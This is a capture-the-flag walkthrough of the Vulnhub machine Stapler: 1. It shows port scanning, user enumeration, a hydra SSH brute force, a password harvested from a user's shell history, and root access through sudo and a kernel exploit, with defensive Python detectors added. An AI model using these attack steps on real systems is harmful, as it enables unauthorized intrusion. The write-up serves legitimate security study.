Stapler: 1

Stapler: 1 from Vulnhub

Nmap scan result

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-17 12:29 CST
Warning: giving up on port because retransmission cap hit (2).
Nmap scan report for
Host is up (0.00035s latency).
Not shown: 992 filtered ports
20/tcp   closed ftp-data
21/tcp   open   ftp
22/tcp   open   ssh
53/tcp   open   domain
80/tcp   open   http
139/tcp  open   netbios-ssn
666/tcp  open   doom
3306/tcp open   mysql
MAC Address: 08:00:27:F5:FB:B3 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 8.43 seconds

The description says that:

There are multiple methods to-do this machine
At least two (2) paths to get a limited shell
At least three (3) ways to get a root access

Limited shell 1

I used enum4linux to test the 139 port, which gave me the users on this machine.

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)

Then I composed these names into a file and tried to brute force the SSH service with it, using the list for both the username and the password.

# grep 'Unix User' e4l_result | cut -d'\' -f2 | cut -d' ' -f1 > user_list
# hydra -L user_list -P user_list ssh

Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-17 13:42:48
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 16 tasks per 1 server, overall 64 tasks, 900 login tries (l:30/p:30), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host:   login: SHayslett   password: SHayslett

Here we got SHayslett, whose password is the same as the username. Now we can log in over SSH with this credential.

ssh SHayslett@
~          Barry, don't forget to put a message here           ~
SHayslett@'s password:
Welcome back!

SHayslett@red:~$ id
uid=1005(SHayslett) gid=1005(SHayslett) groups=1005(SHayslett)
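What the brute-force attempt above would look like from the defender's side: an added example, not part of the original writeup, that runs a simple threshold detector over constructed sshd auth.log lines, flagging a source that fails many logins in a short window and recording whether a later login from the same source succeeded. The log lines, IP addresses and threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample sshd log lines (syslog format); not captured from the box.
SAMPLE_AUTH_LOG = """\
Jun 17 13:42:48 red sshd[2101]: Failed password for invalid user admin from 192.0.2.10 port 50211 ssh2
Jun 17 13:42:48 red sshd[2102]: Failed password for RNunemaker from 192.0.2.10 port 50212 ssh2
Jun 17 13:42:49 red sshd[2103]: Failed password for ETollefson from 192.0.2.10 port 50213 ssh2
Jun 17 13:42:49 red sshd[2104]: Failed password for DSwanger from 192.0.2.10 port 50214 ssh2
Jun 17 13:42:50 red sshd[2105]: Failed password for AParnell from 192.0.2.10 port 50215 ssh2
Jun 17 13:42:50 red sshd[2106]: Accepted password for SHayslett from 192.0.2.10 port 50216 ssh2
Jun 17 13:50:01 red sshd[2200]: Failed password for jamie from 192.0.2.77 port 40001 ssh2
Jun 17 13:52:10 red sshd[2201]: Accepted password for jamie from 192.0.2.77 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2$"
)

def parse_auth_log(text):
    """Yield (timestamp, result, user, source_ip) for each password auth line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            # syslog lines carry no year; only relative times matter here
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["ip"]

def detect_bruteforce(text, threshold=5, window_s=60):
    """Return one alert per source IP that fails >= threshold logins within
    window_s seconds. The alert lists the usernames tried (a user-list spray
    like hydra -L/-P shows many distinct names) and records the first
    username that later succeeded from the same source, if any."""
    recent = defaultdict(list)   # ip -> [(ts, user)] still inside the window
    alerts = {}                  # ip -> alert dict, created when the threshold trips
    for ts, result, user, ip in parse_auth_log(text):
        if result == "Failed":
            recent[ip] = [(t, u) for t, u in recent[ip]
                          if (ts - t).total_seconds() <= window_s]
            recent[ip].append((ts, user))
            if len(recent[ip]) >= threshold and ip not in alerts:
                alerts[ip] = {"ip": ip, "failures": len(recent[ip]),
                              "users": sorted({u for _, u in recent[ip]}),
                              "success_after": None}
        elif ip in alerts and alerts[ip]["success_after"] is None:
            alerts[ip]["success_after"] = user
    return list(alerts.values())
```

A single failure followed minutes later by a success (the second source) stays below the threshold and produces no alert.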

Privilege Escalation 1

After logging in as SHayslett, I found that every user’s home directory can be browsed.

SHayslett@red:/home$ ls -al
total 128
drwxr-xr-x 32 root       root       4096 Jun  4 20:13 .
drwxr-xr-x 22 root       root       4096 Jun  7 09:08 ..
drwxr-xr-x  2 AParnell   AParnell   4096 Jun  5 18:21 AParnell
drwxr-xr-x  2 CCeaser    CCeaser    4096 Jun  5 18:26 CCeaser
drwxr-xr-x  2 CJoo       CJoo       4096 Jun  5 18:24 CJoo
drwxr-xr-x  2 Drew       Drew       4096 Jun  5 18:24 Drew
drwxr-xr-x  2 DSwanger   DSwanger   4096 Jun  5 18:24 DSwanger
drwxr-xr-x  2 Eeth       Eeth       4096 Jun  5 18:24 Eeth
drwxr-xr-x  2 elly       elly       4096 Jun  5 18:24 elly
drwxr-xr-x  2 ETollefson ETollefson 4096 Jun  5 18:24 ETollefson
drwxr-xr-x  2 IChadwick  IChadwick  4096 Jun  5 18:24 IChadwick
drwxr-xr-x  2 jamie      jamie      4096 Jun  5 18:26 jamie
drwxr-xr-x  2 JBare      JBare      4096 Jun  5 18:24 JBare
drwxr-xr-x  2 jess       jess       4096 Jun  5 18:24 jess
drwxr-xr-x  2 JKanode    JKanode    4096 Jun  5 18:25 JKanode
drwxr-xr-x  2 JLipps     JLipps     4096 Jun  5 18:26 JLipps
drwxr-xr-x  2 kai        kai        4096 Jun  5 18:24 kai
drwxr-xr-x  2 LSolum     LSolum     4096 Jun  5 18:24 LSolum
drwxr-xr-x  2 LSolum2    LSolum2    4096 Jun  5 18:26 LSolum2
drwxr-xr-x  2 MBassin    MBassin    4096 Jun  5 18:24 MBassin
drwxr-xr-x  2 mel        mel        4096 Jun  5 18:24 mel
drwxr-xr-x  2 MFrei      MFrei      4096 Jun  5 18:24 MFrei
drwxr-xr-x  2 NATHAN     NATHAN     4096 Jun  5 18:24 NATHAN
drwxr-xr-x  3 peter      peter      4096 Jun  3 16:11 peter
drwxr-xr-x  2 RNunemaker RNunemaker 4096 Jun  5 18:24 RNunemaker
drwxr-xr-x  2 Sam        Sam        4096 Jun  5 18:24 Sam
drwxr-xr-x  2 SHAY       SHAY       4096 Jun  5 18:24 SHAY
drwxr-xr-x  3 SHayslett  SHayslett  4096 Jun 17 13:04 SHayslett
drwxr-xr-x  2 SStroud    SStroud    4096 Jun  5 18:24 SStroud
drwxr-xr-x  2 Taylor     Taylor     4096 Jun  5 18:26 Taylor
drwxrwxrwx  2 www        www        4096 Jun  5 18:25 www
drwxr-xr-x  2 zoe        zoe        4096 Jun  5 18:26 zoe
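An added audit example, not from the original writeup, that parses `ls -al` output in the layout shown above and reports home directories whose mode lets users other than the owner list or write them; the world-writable /home/www and the world-readable homes are exactly what the listing reveals. The listing below is a constructed excerpt, and the group rule (flag group access only when the group is not the owner's private group) is an assumption.

```python
import re

# Constructed excerpt of `ls -al /home` (same column layout as GNU ls -l).
SAMPLE_LISTING = """\
total 128
drwxr-xr-x 32 root       root       4096 Jun  4 20:13 .
drwxr-xr-x 22 root       root       4096 Jun  7 09:08 ..
drwxr-xr-x  2 JKanode    JKanode    4096 Jun  5 18:25 JKanode
drwxr-xr-x  3 peter      peter      4096 Jun  3 16:11 peter
drwx------  2 alice      alice      4096 Jun  5 18:24 alice
drwxrwx---  2 bob        staff      4096 Jun  5 18:24 bob
drwxrwxrwx  2 www        www        4096 Jun  5 18:25 www
"""

# type+mode, links, owner, group, size, month, day, time-or-year, name
LS_RE = re.compile(
    r"^(?P<mode>[d\-][rwxsStT\-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\d+\s+\S+\s+(?P<name>.+)$"
)

def audit_home_listing(text):
    """Return (name, mode, issues) for each directory that users other than
    the owner can list, traverse or write. '.' and '..' are skipped."""
    findings = []
    for line in text.splitlines():
        m = LS_RE.match(line)
        if not m or m["name"] in (".", "..") or m["mode"][0] != "d":
            continue
        mode = m["mode"]
        group_bits, other_bits = mode[4:7], mode[7:10]
        issues = []
        if "w" in other_bits:
            issues.append("world-writable")
        if "r" in other_bits or "x" in other_bits:
            issues.append("world-readable/traversable")
        if m["group"] != m["owner"]:
            # a shared (non-private) group: its members can get in too
            if "w" in group_bits:
                issues.append("writable by group " + m["group"])
            elif "r" in group_bits or "x" in group_bits:
                issues.append("readable by group " + m["group"])
        if issues:
            findings.append((m["name"], mode, issues))
    return findings
```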

Let’s check if there’s any interesting stuff in them.

SHayslett@red:/home$ ls -alR | grep -v .bash_logout | grep -v .bashrc |grep -v .profile
total 24
drwxr-xr-x  2 JKanode JKanode 4096 Jun  5 18:25 .
drwxr-xr-x 32 root    root    4096 Jun  4 20:13 ..
-rw-r--r--  1 JKanode JKanode  167 Jun  5 18:25 .bash_history

We found something different in JKanode’s and peter’s home directories.

Now let’s take a look at the .bash_history in JKanode’s home directory.

SHayslett@red:/home/JKanode$ cat .bash_history
ls -lah
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
kill -9 3747

Looks like we have peter’s password here. Now it’s time to switch to peter’s account.

(Not sure if this is the second way to get the limited shell)
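An added example, not from the original writeup, of the check a defender could run over users' shell history files to find passwords passed on the command line, as with the sshpass -p lines above. The history text and password values are constructed placeholders, and the mysql and curl patterns go beyond the page's sshpass case.

```python
import re

# Constructed history sample; the secrets are placeholders, not real values.
SAMPLE_HISTORY = """\
ls -lah
ps aux
sshpass -p PLACEHOLDER_PW1 ssh JKanode@localhost
apt-get install sshpass
sshpass -p PLACEHOLDER_PW2 peter@localhost
mysql -u root -pPLACEHOLDER_PW3 wordpress
curl -u deploy:PLACEHOLDER_PW4 https://example.invalid/api
ps -ef
"""

# Each pattern's group 1 captures the secret so the report can redact it.
CREDENTIAL_PATTERNS = [
    ("sshpass", re.compile(r"\bsshpass\s+-p\s*(\S+)")),
    ("mysql", re.compile(r"\bmysql\b.*?\s-p(\S+)")),          # joined -pSECRET form
    ("curl", re.compile(r"\bcurl\b.*?\s-u\s*\S*?:(\S+)")),    # -u user:SECRET
]

def scan_history(text):
    """Return one finding per history line that carries a password on the
    command line: {"line": n, "tool": name, "command": redacted line}."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for tool, pattern in CREDENTIAL_PATTERNS:
            m = pattern.search(line)
            if m:
                secret = m.group(1)
                findings.append({"line": lineno, "tool": tool,
                                 "command": line.replace(secret, "*" * 8)})
                break   # one finding per line is enough
    return findings

if __name__ == "__main__":
    for hit in scan_history(SAMPLE_HISTORY):
        print("line %(line)d [%(tool)s]: %(command)s" % hit)
```

Run against `/home/*/.bash_history` (and .zsh_history) on a host, this gives a short list of accounts whose passwords should be rotated and whose history should be cleared.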

SHayslett@red:/home/JKanode$ ssh peter@localhost
The authenticity of host 'localhost (' can't be established.
ECDSA key fingerprint is SHA256:WuY26BwbaoIOawwEIZRaZGve4JZFaRo7iSvLNoCwyfA.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
~          Barry, don't forget to put a message here           ~
peter@localhost's password:
Welcome back!
This is the Z Shell configuration function for new users,
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~).  This function can help you with a few settings that should
make your use of the shell easier.

You can:

(q)  Quit and do nothing.  The function will be run again next time.

(0)  Exit, creating the file ~/.zshrc containing just a comment.
     That will prevent this function being run again.

(1)  Continue to the main menu.

(2)  Populate your ~/.zshrc with the configuration recommended
     by the system administrator and exit (you will need to edit
     the file by hand, if so desired).

--- Type one of the keys in parentheses ---q
%red id
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)

Now we are logged in as peter. Let’s check the home directory first.

red% ls -al
total 72
drwxr-xr-x  3 peter peter  4096 Jun  3 16:11 .
drwxr-xr-x 32 root  root   4096 Jun  4 20:13 ..
-rw-------  1 peter peter     1 Jun  5 18:00 .bash_history
-rw-r--r--  1 peter peter   220 Jun  3 13:53 .bash_logout
-rw-r--r--  1 peter peter  3771 Jun  3 13:53 .bashrc
drwx------  2 peter peter  4096 Jun  6 23:17 .cache
-rw-r--r--  1 peter peter   675 Jun  3 13:53 .profile
-rw-r--r--  1 peter peter     0 Jun  3 13:55 .sudo_as_admin_successful
-rw-------  1 peter peter   577 Jun  3 14:11 .viminfo
-rw-rw-r--  1 peter peter 39206 Jun  3 16:11 .zcompdump


The .sudo_as_admin_successful file suggests peter has used sudo before. Let’s give it a try.

red% sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for peter:
Matching Defaults entries for peter on red:
    lecture=always, env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User peter may run the following commands on red:
    (ALL : ALL) ALL

It seems that peter is allowed to run all commands via sudo. Now we can simply become root and get the flag!

red% sudo su
➜  peter id
uid=0(root) gid=0(root) groups=0(root)
➜  peter cat /root/flag.txt
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)

Privilege Escalation 2

Here’s the system information.

red% uname -a
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
red% cat /etc/os-release
VERSION="16.04 LTS (Xenial Xerus)"
PRETTY_NAME="Ubuntu 16.04 LTS"

It can be easily pwned with the exploit found on Exploit-DB.

red% ./compile.sh
doubleput.c: In function ‘make_setuid’:
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
red% ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@red:~/ebpf_mapfd_doubleput_exploit# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare),1000(peter)
root@red:~/ebpf_mapfd_doubleput_exploit# cat /root/flag.txt
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)

Ongoing Attempts

Port 666

After connecting to port 666 with nc, it responds with a stream of data and then closes the connection.

I redirected the stream to an output file. It turns out to be a zip file containing an image called message2.jpg.

# nc 666 > output
# file output
output: Zip archive data, at least v2.0 to extract
# unzip output
Archive:  output
  inflating: message2.jpg

Then I got a “cookie” by running strings on it…

# strings message2.jpg
vPhotoshop 3.0
1If you are reading this, you should get a cookie!

Port 80

The web server is set up by running PHP’s built-in server (php -S) directly, via authbind, as the www user.

red% ps aux
root      1409  0.0  0.2   6472  3060 ?        S    11:07   0:00 su -c authbind php -S -t /home/www/ &>/dev/null www